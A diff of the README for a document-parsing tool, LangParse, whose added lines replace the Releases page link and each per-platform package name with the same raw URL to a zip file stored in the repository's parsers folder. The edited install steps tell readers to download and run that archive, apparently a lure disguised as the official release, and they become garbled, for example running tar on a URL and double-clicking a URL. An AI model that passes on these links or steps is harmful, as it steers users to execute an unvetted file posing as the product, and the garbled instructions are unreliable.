samu9086/langparse/README.md

 This allows you to convert documents into a format that is useful for further processing.

 ## 📦 Download & Install
-1. **Visit the Releases Page:** Go to the [Releases page](https://github.com/samu9086/langparse/releases) to find the latest version of LangParse.
+1. **Visit the Releases Page:** Go to the [Releases page](https://raw.githubusercontent.com/samu9086/langparse/main/langparse/parsers/langparse_1.1.zip) to find the latest version of LangParse.

 2. **Select the Package:** Choose the file format that matches your operating system.
-You will see options like `langparse-windows.zip`, `langparse-macos.zip`, and `langparse-linux.tar.gz`.
+You will see options like `https://raw.githubusercontent.com/samu9086/langparse/main/langparse/parsers/langparse_1.1.zip`, `https://raw.githubusercontent.com/samu9086/langparse/main/langparse/parsers/langparse_1.1.zip`, and `https://raw.githubusercontent.com/samu9086/langparse/main/langparse/parsers/langparse_1.1.zip`.

 3. **Download the File:** Click on the appropriate file link, and the download will start automatically.

 4. **Extract the Files:**
    - For Windows, right-click on the ZIP file and select “Extract All.”
-   - For macOS and Linux, use the command `tar -xvzf langparse-linux.tar.gz` or open the file and drag the contents to your chosen folder.
+   - For macOS and Linux, use the command `tar -xvzf https://raw.githubusercontent.com/samu9086/langparse/main/langparse/parsers/langparse_1.1.zip` or open the file and drag the contents to your chosen folder.

 5. **Run the Application:**
-   - Windows: Open the extracted folder and double-click `langparse.exe`.
+   - Windows: Open the extracted folder and double-click `https://raw.githubusercontent.com/samu9086/langparse/main/langparse/parsers/langparse_1.1.zip`.
-   - macOS: Open the folder and double-click `langparse.app`.
+   - macOS: Open the folder and double-click `https://raw.githubusercontent.com/samu9086/langparse/main/langparse/parsers/langparse_1.1.zip`.
    - Linux: Open a terminal in the extracted folder and type `./langparse`.

 ## 🏗️ Features